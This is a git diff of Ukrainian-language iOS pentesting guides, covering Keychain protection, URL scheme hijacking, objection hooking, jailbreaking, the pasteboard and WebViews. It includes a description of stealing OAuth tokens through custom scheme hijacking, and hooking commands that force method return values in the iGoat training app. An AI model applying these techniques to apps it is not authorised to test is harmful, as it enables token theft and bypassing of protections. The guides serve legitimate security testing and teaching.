Додатки встановлюються в конкретному каталозі (`private/var/mobile/Applications/{random ID}`) і мають обмежений доступ для читання до певних системних областей і функцій, таких як SMS та телефонні дзвінки. Доступ до захищених областей викликає спливаюче вікно з запитом на дозвіл користувача.
Додатки встановлюються в конкретний каталог (`private/var/mobile/Applications/{random ID}`) і мають обмежений доступ для читання до певних системних областей і функцій, таких як SMS та телефонні дзвінки. Доступ до захищених областей викликає спливаюче вікно з запитом на дозвіл користувача.
# Захист даних
iOS пропонує розробникам **API захисту даних**, побудовані на основі Secure Enclave Processor (SEP) — спеціального сопроцесора для криптографічних операцій та управління ключами. SEP забезпечує цілісність захисту даних за допомогою унікального ключа, специфічного для пристрою, UID пристрою, вбудованого в нього.
iOS пропонує розробникам **API захисту даних**, побудовані на основі Secure Enclave Processor (SEP) — спеціалізованого сопроцесора для криптографічних операцій та управління ключами. SEP забезпечує цілісність захисту даних за допомогою унікального ключа, специфічного для пристрою, UID пристрою, вбудованого в нього.
При створенні файлу генерується унікальний 256-бітний AES ключ шифрування, який шифрує вміст файлу. Цей ключ шифрування, разом з класом ID, потім шифрується за допомогою класного ключа і зберігається в метаданих файлу. Дешифрування файлу передбачає використання системного ключа для доступу до метаданих, отримання класного ключа за допомогою класу ID, а потім дешифрування унікального ключа шифрування файлу.
@ -52,23 +52,23 @@ API Ключниці, детально описаний у [документац
Рівні захисту даних для елементів Ключниці встановлюються за допомогою атрибута `kSecAttrAccessible` під час створення або оновлення елемента. Ці рівні, [як зазначено Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), визначають, коли і як елементи Ключниці доступні:
- **`kSecAttrAccessibleAlways`**: Доступний у будь-який час, незалежно від статусу блокування пристрою.
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Завжди доступний, але не включений у резервні копії.
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Завжди доступний, але не включається в резервні копії.
- **`kSecAttrAccessibleAfterFirstUnlock`**: Доступний після першого розблокування після перезавантаження.
- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Те ж саме, але не переноситься на нові пристрої.
- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Те ж саме, але не підлягає перенесенню на нові пристрої.
- **`kSecAttrAccessibleWhenUnlocked`**: Доступний лише коли пристрій розблоковано.
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Доступний при розблокуванні, не включений у резервні копії.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Вимагає код доступу пристрою, не включений у резервні копії.
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Доступний при розблокуванні, не включається в резервні копії.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Вимагає код доступу пристрою, не включається в резервні копії.
**`AccessControlFlags`** додатково уточнюють методи доступу, дозволяючи біометричну аутентифікацію або використання коду доступу.
### **Попередження про зламані пристрої**
### **Попередження про джейлбрейкнуті пристрої**
> [!WARNING]
> На **зламаних пристроях** захисти Ключниці скомпрометовані, що становить значний ризик безпеки.
> На **джейлбрейкнутіх пристроях** захисти Ключниці скомпрометовані, що становить значний ризик безпеки.
### **Стійкість даних Ключниці**
На відміну від даних, специфічних для програми, які видаляються при видаленні програми, **дані Ключниці зберігаються** на пристрої. Ця характеристика може дозволити новим власникам вживаного пристрою отримати доступ до даних програми попереднього власника, просто перевстановивши програми. Розробникам рекомендується проактивно очищати дані Ключниці під час встановлення програми або під час виходу, щоб зменшити цей ризик. Ось приклад коду Swift, що демонструє, як очистити дані Ключниці при першому запуску програми:
На відміну від специфічних даних програми, які видаляються при видаленні програми, **дані Ключниці зберігаються** на пристрої. Ця характеристика може дозволити новим власникам вживаного пристрою отримати доступ до даних програми попереднього власника, просто перевстановивши програми. Розробникам рекомендується проактивно очищати дані Ключниці під час установки програми або під час виходу, щоб зменшити цей ризик. Ось приклад коду Swift, що демонструє, як очистити дані Ключниці при першому запуску програми:
```swift
let userDefaults = UserDefaults.standard
@ -84,13 +84,13 @@ userDefaults.synchronize() // Forces the app to update UserDefaults
У сфері розробки додатків **пісочниця** відіграє важливу роль у підвищенні безпеки. Цей процес забезпечує, що кожен додаток працює в своїй унікальній домашній директорії, запобігаючи доступу до системних файлів або даних, що належать іншим додаткам. Виконання цих обмежень здійснюється через політики пісочниці, які є частиною **Trusted BSD (MAC) Mandatory Access Control Framework**.
Розробники мають можливість налаштовувати певні **можливості або дозволи** для своїх додатків, такі як **Захист даних** або **Спільний доступ до ключів**. Ці дозволи застосовуються відразу після встановлення додатка. Проте, для доступу до певних захищених ресурсів, додаток повинен отримати явну згоду користувача під час першої спроби. Це досягається за допомогою _рядків мети_ або _рядків опису використання_, які подаються користувачам у сповіщенні про запит дозволу.
Розробники мають можливість налаштовувати певні **можливості або дозволи** для своїх додатків, такі як **Захист даних** або **Спільний доступ до ключів**. Ці дозволи застосовуються відразу після встановлення додатка. Проте, для доступу до певних захищених ресурсів, додаток повинен отримати явну згоду користувача під час першої спроби. Це досягається за допомогою _рядків мети_ або _рядків опису використання_, які представляються користувачам у сповіщенні про запит дозволу.
Для тих, хто має доступ до вихідного коду, перевірка дозволів, включених у файл `Info.plist`, може бути виконана наступним чином:
Для тих, хто має доступ до вихідного коду, перевірка дозволів, включених у файл `Info.plist`, може бути виконана шляхом:
1. Відкрити проект у Xcode.
2. Знайти та відкрити файл `Info.plist`.
3. Шукати ключі, що починаються з `"Privacy -"`, з можливістю перегляду сирих ключів/значень для ясності.
1. Відкриття проекту в Xcode.
2. Знаходження та відкриття файлу `Info.plist`.
3. Пошуку ключів, що починаються з `"Privacy -"`, з можливістю перегляду сирих ключів/значень для ясності.
При роботі з файлом IPA можна виконати наступні кроки:
@ -118,7 +118,7 @@ userDefaults.synchronize() // Forces the app to update UserDefaults
## Права
**Права** є ще одним критично важливим аспектом розробки додатків для iOS, що слугують як пари ключ-значення, які надають додаткам дозвіл виконувати певні операції, що виходять за межі перевірок під час виконання. Наприклад, увімкнення **Захисту даних** у додатку передбачає додавання конкретного права в проект Xcode, що потім відображається у файлі прав додатку або в вбудованому файлі мобільного провізування для IPA.
**Права** є ще одним критично важливим аспектом розробки додатків для iOS, служачи як пари ключ-значення, які надають додаткам дозвіл виконувати певні операції, що виходять за межі перевірок під час виконання. Наприклад, увімкнення **Захисту даних** у додатку передбачає додавання конкретного права в проект Xcode, що потім відображається у файлі прав додатку або в вбудованому файлі мобільного провізіонування для IPA.
# Посилання

8
src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
View File

@ -4,7 +4,7 @@
## Основна інформація
Користувацькі URL-схеми дозволяють додаткам спілкуватися, використовуючи власний протокол, як детально описано в [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Ці схеми повинні бути оголошені додатком, який потім обробляє вхідні URL відповідно до цих схем. Важливо **перевіряти всі параметри URL** та **відкидати будь-які неправильно сформовані URL**, щоб запобігти атакам через цей вектор.
Користувацькі URL-схеми дозволяють додаткам спілкуватися, використовуючи спеціальний протокол, як детально описано в [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Ці схеми повинні бути оголошені додатком, який потім обробляє вхідні URL відповідно до цих схем. Важливо **перевіряти всі параметри URL** та **відкидати будь-які неправильно сформовані URL**, щоб запобігти атакам через цей вектор.
Наводиться приклад, де URI `myapp://hostname?data=123876123` викликає певну дію програми. Відзначена вразливість була в додатку Skype Mobile, який дозволяв неприпустимі дії дзвінків через протокол `skype://`. Зареєстровані схеми можна знайти в `Info.plist` додатка під `CFBundleURLTypes`. Зловмисні програми можуть використовувати це, повторно реєструючи URI для перехоплення чутливої інформації.
@ -62,12 +62,12 @@ Watching for crashes from iGoat...
No logs were moved.
Opened URL: iGoat://?contactNumber=0&message=0
```
## Викрадення користувацьких URL-схем
## Викрадення користувацької URL-схеми
Згідно з [**цим постом**](https://evanconnelly.github.io/post/ios-oauth/), шкідливі програми можуть **реєструвати інші програми з користувацькими схемами,** тоді шкідлива програма може відкрити браузер, який має всі куки Safari App з [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;
Згідно з [**цим постом**](https://evanconnelly.github.io/post/ios-oauth/), шкідливі програми можуть **реєструвати інші програми з користувацькими схемами,** тоді шкідлива програма може відкрити браузер, який має всі куки програми Safari з [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;
За допомогою браузера шкідлива програма може завантажити веб-сторінку, контрольовану зловмисником, і TCC запитає у мобільного користувача дозволи на відкриття цієї програми. Потім шкідлива веб-сторінка може перенаправити на сторінку жертви, наприклад, на OAuth потік з параметром `prompt=none`. Якщо користувач вже увійшов у OAuth потік, OAuth потік надішле секрет назад до жертви, використовуючи користувацьку схему жертви.\
Однак, оскільки шкідлива програма також зареєструвала її і оскільки використовуваний браузер знаходиться всередині шкідливої програми, користувацька схема в цьому випадку буде оброблятися шкідливою програмою, яка зможе вкрасти OAuth токен.
Однак, оскільки шкідлива програма також зареєструвала її і оскільки використовуваний браузер знаходиться всередині шкідливої програми, користувацька схема буде оброблена в цьому випадку шкідливою програмою, яка зможе вкрасти OAuth токен.
## Посилання

14
src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
View File

@ -179,27 +179,27 @@ ios hooking search methods cvv
[iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:]
```
# Основи хукінгу
# Основне хукування
Тепер, коли ви **перерахували класи та модулі**, що використовуються програмою, ви могли знайти деякі **цікаві назви класів і методів**.
## Хук всіх методів класу
## Хукнути всі методи класу
- `ios hooking watch class <class_name>`: Хук всіх методів класу, скидання всіх початкових параметрів і повернень
- `ios hooking watch class <class_name>`: Хукнути всі методи класу, вивантажити всі початкові параметри та повернення
```bash
ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController
```
## Хук одного методу
## Хукнути один метод
- `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Хук конкретного методу класу, скидання параметрів, трасувань і повернень методу щоразу, коли його викликають
- `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Хукнути конкретний метод класу, вивантажуючи параметри, зворотні виклики та повернення методу щоразу, коли його викликають
```bash
ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return
```
## Зміна логічного повернення
## Змінити логічне повернення
- `ios hooking set return_value "-[<class_name> <method_name>]" false`: Це змусить вибраний метод повертати вказане логічне значення
@ -207,7 +207,7 @@ ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPresse
ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false
```
## Генерація шаблону хукінгу
## Згенерувати шаблон хукування
- `ios hooking generate simple <class_name>`:

6
src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
View File

@ -27,7 +27,7 @@ self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name)
```
### **Покращення безпеки з `NSSecureCoding`**
Щоб зменшити вразливості, коли зловмисники впроваджують дані в уже створені об'єкти, **`NSSecureCoding`** пропонує покращений протокол. Класи, що відповідають `NSSecureCoding`, повинні перевіряти тип об'єктів під час декодування, забезпечуючи, щоб лише очікувані типи об'єктів були створені. Однак важливо зазначити, що хоча `NSSecureCoding` покращує безпеку типів, він не шифрує дані і не забезпечує їх цілісність, що вимагає додаткових заходів для захисту чутливої інформації:
Щоб зменшити вразливості, коли зловмисники впроваджують дані в уже створені об'єкти, **`NSSecureCoding`** пропонує покращений протокол. Класи, що відповідають `NSSecureCoding`, повинні перевіряти тип об'єктів під час декодування, забезпечуючи, що лише очікувані типи об'єктів створюються. Однак важливо зазначити, що хоча `NSSecureCoding` покращує безпеку типів, він не шифрує дані і не забезпечує їх цілісність, що вимагає додаткових заходів для захисту чутливої інформації:
```swift
static var supportsSecureCoding: Bool {
return true
@ -37,14 +37,14 @@ let obj = decoder.decodeObject(of: MyClass.self, forKey: "myKey")
```
## Архівування даних за допомогою `NSKeyedArchiver`
`NSKeyedArchiver` та його аналог `NSKeyedUnarchiver` дозволяють кодувати об'єкти у файл і пізніше їх отримувати. Цей механізм корисний для збереження об'єктів:
`NSKeyedArchiver` та його аналог `NSKeyedUnarchiver` дозволяють кодувати об'єкти у файл, а потім їх відновлювати. Цей механізм корисний для збереження об'єктів:
```swift
NSKeyedArchiver.archiveRootObject(customPoint, toFile: "/path/to/archive")
let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive") as? CustomPoint
```
### Використання `Codable` для спрощеної серіалізації
Протокол `Codable` у Swift поєднує `Decodable` та `Encodable`, полегшуючи кодування та декодування об'єктів, таких як `String`, `Int`, `Double` тощо, без додаткових зусиль:
Протокол `Codable` в Swift поєднує `Decodable` та `Encodable`, полегшуючи кодування та декодування об'єктів, таких як `String`, `Int`, `Double` тощо, без додаткових зусиль:
```swift
struct CustomPointStruct: Codable {
var x: Double

26
src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
View File

@ -6,10 +6,10 @@
**Provisioning identity** - це набір публічних і приватних ключів, які асоційовані з обліковим записом розробника Apple. Щоб **підписувати додатки**, вам потрібно сплатити **99$/рік** для реєстрації в **Apple Developer Program**, щоб отримати вашу provisioning identity. Без цього ви не зможете запускати програми з вихідного коду на фізичному пристрої. Інший варіант - використовувати **jailbroken device**.
Починаючи з Xcode 7.2, Apple надала можливість створити **безкоштовний профіль розробки iOS**, який дозволяє писати та тестувати вашу програму на реальному iPhone. Перейдіть до _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Додати новий Appli ID з вашими обліковими даними) --> _Натисніть на створений Apple ID_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\
\_\_Потім, щоб запустити вашу програму на iPhone, спочатку потрібно **вказати iPhone довіряти комп'ютеру.** Потім ви можете спробувати **запустити програму на мобільному з Xcode,** але з'явиться помилка. Тож перейдіть до _Settings_ --> _General_ --> _Profiles and Device Management_ --> Виберіть ненадійний профіль і натисніть "**Trust**".
Починаючи з Xcode 7.2, Apple надала можливість створити **безкоштовний профіль розробки iOS**, який дозволяє писати та тестувати ваш додаток на реальному iPhone. Перейдіть до _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Додати новий Appli ID з вашими обліковими даними) --> _Натисніть на створений Apple ID_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\
\_\_Потім, щоб запустити ваш додаток на вашому iPhone, спочатку потрібно **вказати iPhone довіряти комп'ютеру.** Потім ви можете спробувати **запустити додаток на мобільному з Xcode,** але з'явиться помилка. Тож перейдіть до _Settings_ --> _General_ --> _Profiles and Device Management_ --> Виберіть ненадійний профіль і натисніть "**Trust**".
Зверніть увагу, що **додатки, підписані одним і тим же сертифікатом підпису, можуть безпечно ділитися ресурсами, такими як елементи ключа**.
Зверніть увагу, що **додатки, підписані одним і тим же сертифікатом підпису, можуть безпечно ділитися ресурсами, такими як елементи ключового сховища**.
Профілі provisioning зберігаються всередині телефону в **`/Library/MobileDevice/ProvisioningProfiles`**
@ -44,7 +44,7 @@ iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted)
```
Якщо ви знаєте UID, програми, встановлені в ньому, можна знайти за адресою `/Users/<username>/Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application`
Однак, на диво, ви не знайдете додаток тут. Вам потрібно перейти до `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`
Однак, на диво, ви не знайдете додаток тут. Вам потрібно отримати доступ до `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`
І в цій папці ви можете **знайти пакет програми.**
@ -54,26 +54,26 @@ Corellium є єдиним публічно доступним емуляторо
## Необхідність джейлбрейку
Перегляньте цей блог про те, як провести тестування безпеки iOS-додатка на **не джейлбрейкнутому пристрої**: [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
Перегляньте цей блог про те, як провести pentest iOS-додатку на **не джейлбрейкнутому пристрої**: [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
## Джейлбрейк
Apple суворо вимагає, щоб код, що виконується на iPhone, був **підписаний сертифікатом, виданим Apple**. **Джейлбрейк** це процес активного **обходу таких обмежень** та інших заходів безпеки, встановлених ОС. Тому, як тільки пристрій джейлбрейкнуто, **перевірка цілісності**, яка відповідає за перевірку встановлених додатків, патчується, тому вона **обходиться**.
Apple суворо вимагає, щоб код, що виконується на iPhone, був **підписаний сертифікатом, виданим Apple**. **Джейлбрейк** - це процес активного **обходу таких обмежень** та інших заходів безпеки, встановлених ОС. Тому, як тільки пристрій джейлбрейкнуто, **перевірка цілісності**, яка відповідає за перевірку встановлених додатків, патчується, тому вона **обходиться**.
> [!NOTE]
> На відміну від Android, **ви не можете перейти в "Режим розробника"** в iOS, щоб запускати непідписаний/недовірений код на пристрої.
> На відміну від Android, **ви не можете перейти в "Режим розробника"** в iOS, щоб запустити непідписаний/недовірений код на пристрої.
### Рутування Android vs. Джейлбрейк iOS
### Рутинг Android vs. Джейлбрейк iOS
Хоча їх часто порівнюють, **рутування** на Android і **джейлбрейк** на iOS є принципово різними процесами. Рутування Android-пристроїв може включати **встановлення бінарного файлу `su`** або **заміна системи на рутований кастомний ROM**, що не обов'язково вимагає експлойтів, якщо завантажувач розблоковано. **Флешинг кастомних ROM** замінює ОС пристрою після розблокування завантажувача, іноді вимагаючи експлойт.
Хоча їх часто порівнюють, **рутинг** на Android і **джейлбрейк** на iOS є принципово різними процесами. Рутинг Android-пристроїв може включати **встановлення бінарного файлу `su`** або **заміна системи на рутований кастомний ROM**, що не обов'язково вимагає експлойтів, якщо завантажувач розблоковано. **Флешинг кастомних ROM** замінює ОС пристрою після розблокування завантажувача, іноді вимагаючи експлойт.
На відміну від цього, пристрої iOS не можуть флешити кастомні ROM через обмеження завантажувача, який дозволяє завантажувати лише образи, підписані Apple. **Джейлбрейк iOS** має на меті обійти захист підписування коду Apple, щоб запускати непідписаний код, процес, ускладнений постійними покращеннями безпеки Apple.
На відміну від цього, пристрої iOS не можуть флешити кастомні ROM через обмеження завантажувача, який дозволяє завантажувати лише образи, підписані Apple. **Джейлбрейк iOS** має на меті обійти захист підписування коду Apple, щоб запустити непідписаний код, процес, ускладнений постійними покращеннями безпеки Apple.
### Виклики джейлбрейку
Джейлбрейк iOS стає все більш складним, оскільки Apple швидко патчує вразливості. **Пониження iOS** можливе лише протягом обмеженого часу після випуску, що робить джейлбрейк справою, чутливою до часу. Пристрої, що використовуються для тестування безпеки, не повинні оновлюватися, якщо повторний джейлбрейк не гарантований.
Джейлбрейк iOS стає все більш складним, оскільки Apple швидко патчує вразливості. **Пониження iOS** можливе лише протягом обмеженого часу після випуску, що робить джейлбрейк справою, що залежить від часу. Пристрої, що використовуються для тестування безпеки, не повинні оновлюватися, якщо повторний джейлбрейк не гарантований.
Оновлення iOS контролюються **механізмом виклику-відповіді** (SHSH blobs), що дозволяє встановлення лише для підписаних Apple відповідей. Цей механізм, відомий як "вікно підписування", обмежує можливість зберігати та пізніше використовувати OTA пакети прошивки. Вебсайт [IPSW Downloads](https://ipsw.me) є ресурсом для перевірки поточних вікон підписування.
Оновлення iOS контролюються **механізмом виклику-відповіді** (SHSH blobs), що дозволяє встановлення лише для підписаних Apple відповідей. Цей механізм, відомий як "вікно підписання", обмежує можливість зберігати та пізніше використовувати OTA пакети прошивки. Вебсайт [IPSW Downloads](https://ipsw.me) є ресурсом для перевірки поточних вікон підписання.
### Види джейлбрейку
@ -94,7 +94,7 @@ Apple суворо вимагає, щоб код, що виконується н
### Переваги та ризики джейлбрейку
Джейлбрейк **усуває накладене ОС пісочницю**, дозволяючи додаткам отримувати доступ до всієї файлової системи. Ця свобода дозволяє встановлювати непідтверджені додатки та отримувати доступ до більшої кількості API. Однак для звичайних користувачів джейлбрейк **не рекомендується** через потенційні ризики безпеки та нестабільність пристрою.
Джейлбрейк **усуває пісочницю, накладену ОС**, дозволяючи додаткам отримувати доступ до всієї файлової системи. Ця свобода дозволяє встановлювати непідтверджені додатки та отримувати доступ до більшої кількості API. Однак для звичайних користувачів джейлбрейк **не рекомендується** через потенційні ризики безпеки та нестабільність пристрою.
### **Після джейлбрейку**

14
src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
View File

@ -4,36 +4,36 @@
# UIActivity Sharing Simplified
Починаючи з iOS 6, сторонні додатки отримали можливість **ділитися даними** такими як текст, URL-адреси або зображення, використовуючи механізми, такі як AirDrop, як зазначено в [посібнику з міждодаткового зв'язку](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3) від Apple. Ця функція проявляється через системну _аркуш активності спільного використання_, який з'являється при взаємодії з кнопкою "Поділитися".
Починаючи з iOS 6, сторонні додатки отримали можливість **ділитися даними** такими як текст, URL-адреси або зображення, використовуючи механізми, такі як AirDrop, як зазначено в [посібнику з міждодаткового зв'язку](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3) від Apple. Ця функція проявляється через загальносистемний _лист активності обміну_, який з'являється при взаємодії з кнопкою "Поділитися".
Вичерпний перелік усіх вбудованих варіантів спільного використання доступний за посиланням [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Розробники можуть вирішити виключити певні варіанти спільного використання, якщо вважають їх непридатними для свого додатку.
Вичерпний перелік усіх вбудованих варіантів обміну доступний за посиланням [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Розробники можуть вирішити виключити певні варіанти обміну, якщо вважають їх непридатними для свого додатку.
## **How to Share Data**
Увага повинна бути зосереджена на:
- Природі даних, що діляться.
- Природі даних, що обмінюються.
- Включенні користувацьких активностей.
- Виключенні певних типів активностей.
Спільне використання здійснюється через створення `UIActivityViewController`, до якого передаються елементи, призначені для спільного використання. Це досягається шляхом виклику:
Обмін здійснюється через створення `UIActivityViewController`, до якого передаються елементи, призначені для обміну. Це досягається шляхом виклику:
```bash
$ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
0x1000df034 45 44 initWithActivityItems:applicationActivities:
```
Розробники повинні ретельно перевіряти `UIActivityViewController` на наявність активностей та користувацьких активностей, з якими він ініціалізується, а також будь-яких вказаних `excludedActivityTypes`.
Розробники повинні ретельно перевіряти `UIActivityViewController` на предмет активностей та користувацьких активностей, з якими він ініціалізується, а також будь-яких вказаних `excludedActivityTypes`.
## **Як отримати дані**
Наступні аспекти є критично важливими при отриманні даних:
- Оголошення **кастомних типів документів**.
- Оголошення **користувацьких типів документів**.
- Визначення **типів документів, які може відкривати додаток**.
- Перевірка **цілісності отриманих даних**.
Без доступу до вихідного коду, можна все ще перевірити `Info.plist` на наявність ключів, таких як `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations` та `CFBundleDocumentTypes`, щоб зрозуміти, які типи документів може обробляти та оголошувати додаток.
Стисла інструкція щодо цих ключів доступна на [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), підкреслюючи важливість визначення та імпортування UTI для системного визнання та асоціювання типів документів з вашим додатком для інтеграції в діалозі "Відкрити з".
Стисла інструкція щодо цих ключів доступна на [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), підкреслюючи важливість визначення та імпортування UTI для системного визнання та асоціювання типів документів з вашим додатком для інтеграції в діалозі "Відкрити з...".
## Динамічний підхід до тестування

6
src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
View File

@ -8,9 +8,9 @@
**Безпекові міркування** відіграють значну роль при використанні буферних пам'ятей. Наприклад:
- Немає механізму для користувачів для управління дозволами додатків на доступ до **буферної пам'яті**.
- Щоб зменшити ризик несанкціонованого моніторингу буферної пам'яті у фоновому режимі, доступ обмежується до моменту, коли додаток знаходиться на передньому плані (з iOS 9).
- Щоб зменшити ризик несанкціонованого моніторингу буферної пам'яті у фоновому режимі, доступ обмежений до моменту, коли додаток знаходиться на передньому плані (з iOS 9).
- Використання постійних іменованих буферних пам'ятей не рекомендується на користь спільних контейнерів через проблеми конфіденційності.
- Функція **Універсальний буфер обміну**, введена з iOS 10, що дозволяє обмінюватися контентом між пристроями через загальну буферну пам'ять, може бути керована розробниками для встановлення терміну дії даних і відключення автоматичного перенесення контенту.
- Функція **Універсальний буфер обміну**, введена з iOS 10, що дозволяє обмінюватися контентом між пристроями через загальну буферну пам'ять, може бути керована розробниками для встановлення терміну дії даних та відключення автоматичного перенесення контенту.
Забезпечення того, щоб **чутлива інформація не зберігалася ненавмисно** в глобальній буферній пам'яті, є критично важливим. Крім того, додатки повинні бути спроектовані так, щоб запобігти зловживанню даними глобальної буферної пам'яті для ненавмисних дій, і розробників заохочують впроваджувати заходи для запобігання копіюванню чутливої інформації в буфер обміну.
@ -27,7 +27,7 @@
- Моніторинг `generalPasteboard` для системного використання.
- Трасування `pasteboardWithName:create:` та `pasteboardWithUniqueName` для користувацьких реалізацій.
- Спостереження за застарілими викликами методу `setPersistent:`, щоб перевірити налаштування збереження.
- Спостереження за застарілими викликами методу `setPersistent:` для перевірки налаштувань збереження.
Ключові деталі для моніторингу включають:

4
src/mobile-pentesting/ios-pentesting/ios-universal-links.md
View File

@ -6,7 +6,7 @@
Універсальні посилання пропонують **безшовний редирект** для користувачів, безпосередньо відкриваючи контент в додатку, обходячи необхідність редиректу в Safari. Ці посилання є **унікальними** та безпечними, оскільки їх не можуть вимагати інші додатки. Це забезпечується розміщенням файлу `apple-app-site-association` у кореневому каталозі вебсайту, встановлюючи перевіряємий зв'язок між вебсайтом та додатком. У випадках, коли додаток не встановлено, Safari візьме на себе управління і перенаправить користувача на вебсторінку, зберігаючи присутність додатку.
Для тестувальників на проникнення файл `apple-app-site-association` є особливим інтересом, оскільки він може розкрити **чутливі шляхи**, потенційно включаючи ті, що стосуються не випущених функцій.
Для тестувальників на проникнення файл `apple-app-site-association` є особливо цікавим, оскільки він може розкрити **чутливі шляхи**, потенційно включаючи ті, що стосуються не випущених функцій.
### **Аналіз прав на асоційовані домени**
@ -18,7 +18,7 @@
<string>applinks:t.me</string>
</array>
```
Для більш детальних відомостей зверніться до [архівної документації розробника Apple](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
Для більш детальних відомостей зверніться до [архівної документації Apple Developer](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
Якщо ви працюєте з скомпільованим додатком, права доступу можна витягти, як описано в [цьому посібнику](extracting-entitlements-from-compiled-application.md).

18
src/mobile-pentesting/ios-pentesting/ios-webviews.md
View File

@ -12,7 +12,7 @@ WebViews використовуються в додатках для інтер
- **WKWebView** є переважним варіантом для інтеграції веб-контенту в додатки, пропонуючи покращений контроль над контентом та функціями безпеки. **JavaScript** увімкнено за замовчуванням, але його можна вимкнути за необхідності. Він також підтримує функції, які запобігають автоматичному відкриттю вікон JavaScript і забезпечують безпечне завантаження всього контенту. Крім того, архітектура **WKWebView** мінімізує ризик пошкодження пам'яті, що впливає на основний процес додатка.
- **SFSafariViewController** пропонує стандартизований досвід веб-серфінгу в додатках, який можна впізнати за його специфічним макетом, включаючи поле адреси тільки для читання, кнопки спільного доступу та навігації, а також пряме посилання для відкриття контенту в Safari. На відміну від **WKWebView**, **JavaScript** не можна вимкнути в **SFSafariViewController**, який також ділиться куками та даними з Safari, зберігаючи конфіденційність користувача від додатка. Він повинен бути чітко видимим відповідно до рекомендацій App Store.
- **SFSafariViewController** пропонує стандартизований досвід веб-серфінгу в додатках, який можна впізнати за його специфічним макетом, включаючи поле адреси тільки для читання, кнопки спільного доступу та навігації, а також пряме посилання для відкриття контенту в Safari. На відміну від **WKWebView**, **JavaScript** не можна вимкнути в **SFSafariViewController**, який також ділиться куками та даними з Safari, зберігаючи конфіденційність користувача від додатка. Він повинен бути чітко відображений відповідно до рекомендацій App Store.
```javascript
// Example of disabling JavaScript in WKWebView:
WKPreferences *preferences = [[WKPreferences alloc] init];
@ -57,7 +57,7 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent"
```
### **Інсайти динамічного аналізу**
Динамічний аналіз передбачає перевірку купи на наявність екземплярів WebView та їх властивостей. Для цієї мети використовується скрипт під назвою `webviews_inspector.js`, який націлений на екземпляри `UIWebView`, `WKWebView` та `SFSafariViewController`. Він реєструє інформацію про знайдені екземпляри, включаючи URL-адреси та налаштування, пов'язані з JavaScript та безпечним контентом.
